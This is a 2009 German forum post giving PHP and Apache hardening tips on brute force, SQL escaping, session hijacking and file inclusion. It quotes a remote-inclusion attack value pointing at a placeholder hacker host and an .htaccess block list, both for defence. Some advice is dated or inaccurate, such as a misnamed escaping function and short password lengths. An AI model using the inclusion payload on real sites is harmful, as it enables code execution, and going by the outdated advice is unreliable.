» Server-Sicherheit verbessern - ein paar Tipps

Apache Server Status Monitor ausgeben lassenNeuen Thread eröffnenNeue Antwort erstellenAn alle Querdenker macht mit!!!
AutorNachricht
Administrator 

Name: Marc
Geschlecht:
Anmeldedatum: 28.08.2004
Beiträge: 50597
Chats: 11159
Wohnort: Hennef


Meine eBay-Auktionen:
20.02.2009, 02:37
zitieren

Globale Variablen:
register_globals sollte immer ausgeschaltet sein. Ansonsten kann ein Hacker jede Variable über die URL ändern und übergeben.

Brute Force:
Hierbei probiert der Hacker jedes mögliche Passwort an Hand von einer Abfolge oder Wortsammlungen mit häufigen Wörtern durch. Daher sollten Passworteingaben bei z.B. 5 Fehleingaben zu einer zeitlichen Sperrung führen (z.B. 30 Minuten lang keine Passworteingabe mehr möglich). In der Regel lassen sich MySQL, FTP, htaccess und sonstige Passwörter nicht bei mehrfachen Fehleingaben sperren. Daher sollte man hier ein min. 8-stelliges Passwort wählen welches aus Klein- und Großbuchstaben, Zahlen und Sonderzeichen besteht und dieses sollte man ca. alle 3-6 Monate erneuern. Bis 6 Stellen knackt jeder Hacker das Passwort problemlos sofern er den entsprechenden MD5-String aus der Datenbank hat.

Mini Brute Force:
Eine weitere Abwandlung dieser Attacke nenne ich Mini Brute Force. Hier wird jeder Login 1x durchprobiert. Und zwar wird einfach als Passwort der Username übergeben. Schätzungsweise jeder 200. User hat als Passwort seinen Usernamen angegeben, daher sollte die Sperre für Fehleingaben unabhängig vom Loginnamen erfolgen (bei phpBB z.B. nicht Standard, hier kann man unendlich oft 1x pro User probieren). Oder man verwehrt von vorneherein die Möglichkeit, dass ein User seinen Namen als Passwort angeben kann.

MySQL Queries:
Wenn an Datenbankabfragen Variablen übergeben werden, dann sollte man IMMER mysql_real_escape() auf die Variablen anwenden. addslashes() reicht nicht aus bzw. erkennt nicht alle Anführungszeichen.

Session Highjacking:
Hier sollte klar sein, dass man über Session-IDs alleine keine Logins ermöglichen sollte. Sonst könnte ein Hacker einfach die Session-ID nehmen und sich mit dieser als ein anderer User anmelden. Große Forensoftware kombiniert Session-IDs mit Cookie und/oder IP-Adresse und ist demnach als sicher zu bezeichnen.

Cookie-Session Highjacking:
Hier modifziert der Hacker ein Cookie so, dass es z.B. die Login-Daten des Admins enthält und seine Session-ID etc. Daher sollten Adminbereiche immer doppelt gesichert werden. z.B. wenn ein Hacker ein Auto-Login Cookie stiehlt, kann er sich problemlos auch mit einer anderen IP als Admin im Forum bewegen. Bester Schutz ist daher das Admin-Verzeichnis per .htaccess / .htpasswd mit einem Passwort zu belegen und evtl. Löschmöglichkeiten im offenen Forum (Themen löschen etc.) mit Backups sichern und wiederherstellbar machen oder Themen löschen komplett zu deaktivieren. Bei mir ist es so, dass man nicht löschen kann. Themen landen immer in einem Unterforum (unsichtbar für User) und sind so problemlos wiederherstellbar.

external file inclusion (externe Dateieneinbindung):
Manche URLs haben das Format "page=index" und im Code selbst wird dann über include($page); die entsprechende Seite eingebunden. Das brigt die Gefahr, dass ein Hacker daraus "page=http://hackerseite.com/hacker.txt" einbinden kann. Es gibt in diesem Bereich viele Methoden. Daher empfehle ich in der htaccess pauschal diesen Code einzusetzen:
RewriteEngine on
RewriteCond %{QUERY_STRING} ^(.*)=http://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=http\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=ftp://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=ftp\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=https://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=https\%3A\%2F\%2F(.*) [OR]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
Damit kann dann in der URL kein "http:" etc. mehr eingebunden werden.

Alternativ bietet sich das in der .htaccess an, dass deaktiviert alle externen Einbindungen:
allow_url_fopen = Off

internal file inclusion (interne Dateieneinbindung):
Die aktuellste Methode der Hacker. Sie ist kaum zu unterbinden und erfordert, dass die Seite gute Sicherheitsmechanismen beim Einbinden von Dateien erfolgt. Ähnlich wie bei der external file inclusion werden hier Dateien über page=index in der URL eingebunden. Diesmal wird der Pfad aber korrigiert in "page=../bilder/bild.jpg" um so in einen Avatar-Ordner oder ähnliches zu gelangen, wo man vorher ein Bild hochgeladen hat. Jetzt könnte man sich fragen, was es dem Hacker bringt ein Bild einzubinden. Tatsächlich kann man neuerdings in der Kopfspalte eines Bildes php-Code einbinden und zwar als Kommentar. Es gibt jetzt Software, die einem dies erlaubt und PHP ist leider so dumm und wertet ein Bild tatsächlich aus, wenn Code in Form von darin untergebracht wurde.


pn email
Gast 
20.02.2009, 02:37
zitieren

Mach mit!

Wenn Dir die Beiträge zum Thread "Server-Sicherheit verbessern - ein paar Tipps" gefallen haben oder Du noch Fragen hast oder Ergänzungen machen möchtest, solltest Du Dich gleich bei uns anmelden:



Registrierte Mitglieder genießen die folgenden Vorteile:
✔ kostenlose Mitgliedschaft
keine Werbung
✔ direkter Austausch mit Gleichgesinnten
✔ neue Fragen stellen oder Diskussionen starten
✔ schnelle Hilfe bei Problemen
✔ Bilder und Videos hochladen
✔ und vieles mehr...


Neuen Thread eröffnenNeue Antwort erstellen
Ähnliche BeiträgeRe:
Letzter Beitrag
CRX Frontaufprall-Sicherheit verbessern
Moin. Ich möchte hier mal eine Diskussion zum Thema "wie könnte man einen Frontaufprall abmildern" starten. Mehrere Crashvideos und erschreckende Bilder haben mir gezeigt, dass Crx was einen Frontaufprall betrifft sehr "weich" und...
von mbboy
3
126
23.04.2014, 11:02
Maou
Server geht für ein paar Minuten Offline
Wir wechseln gerade den Datenbankserver. Dauert nicht...
von mgutt
14
555
27.07.2012, 12:29
mgutt
Brauche ein paar Tipps
Hi, Ich bräuchte mal ein paar Tipps von den Profis. Und zwar löst sich meine Folie immer an den Rundungen und Schnittkanten. Gibt es da einen Trick damit sich das nicht wieder...
von Coby
10
414
03.03.2014, 11:17
nik1965
EJ9 motorswap. bräuchte ein paar tipps
Hallo hab vor mein ek3 motor einzubauen in mein ej9(bj 2000) soweit ich mich schlau gemacht hab gibt es vom einbau kein problem.. also passt alles rein. nur eins bin ich mir nicht so sicher und zwar wegen der elektrik ich bräuchte ja dann auch ein...
von Klokaempfer
19
549
24.01.2010, 11:16
Klokaempfer
Auch mal ein paar Tipps von mir
Wer etwas länger anlegen möchte (also nicht nur ein paar Stunden oder Tage), für den wäre eventuell Swedish Match, HP, Fortum oder G.electric etwas. Dort ist dieses Jahr einiges zu erwarten. Also einfach mal anschauen oder informieren, dann wisst ihr...
von Nine
0
164
04.01.2012, 18:28
Nine
Mein Winterprojekt! Brauche noch ein paar Tipps..
Hallo! Ich hab mir mal jetzt ein paar Gedanken gemacht zu meinem CRX. So sieht er zur Zeit aus: http://img99.imageshack.us/my.php?image=crxorigtf6.jpg Dabei habe ich mir gedacht: Erst mal schönes weiß! Dann noch ein paar größere Felgen und ne...
von crxdaniel
5
264
04.09.2008, 10:55
Kaan_EE8
Suche ein paar Tipps für eine Sichere Geldanlage
Hallo zusammen, bei mir ist im Juni ein Sparer fällig geworden der nun mit 1,6% Zinsen verzinst wird. Nun weiß ich nicht wie ich weiter das Geld gewinnbringent Anlegen soll Klar mein Ansprechpartner bei der Bank will NUR das beste für mich oder...
von jocker13
1
573
22.07.2010, 15:41
mgutt
MDA als Navi in Accord verbauen.Benötige noch ein paar Tipps
Hi Leute, mein Handyvertrag läuft ez dann aus und ich wollte mir den T-Mobile MDA compact II + TomTom NAVIGATOR 5.2 holen. Das ganze wollte ich dann in meinen Accord als Navi einbauen. Es sollte dann ungefähr so ausschauen. Ich hatte vor,...
von seeby
41
7.229
21.05.2006, 14:33
NickLess
SEHR SEHR WICHTIG, bitte um ein paar tipps :)
hallo, empfiehlt es sich diesen ej2 civic bj.94 zu kaufen, mit einem ausgetauschten motor, wer hat da erfahrung mit ausgetauschtem motor und so?? alles wurde im werk gemacht und von tüv eingetragen und geprüft:...
von mischka89
7
725
30.04.2007, 13:55
mischka89
hätte ein paar fragen wegen ein paar civic modellen!eg/ek/ej
hallo...an alle erstmal.. so bin grad dabei den führerschein zu machen.. und ich will mir als erst auto nen EK3 kaufen so nun zu meinen fragen... ist in dem EK3 ein SOHC motor? :?: wie siehts mit dem verbrauch aus viel oder eher wenig oder...
von gonzo
21
1.011
15.11.2010, 16:07
MaRtInW2
© 2004 - 2016 www.programmierer-forum.de | Communities | Impressum |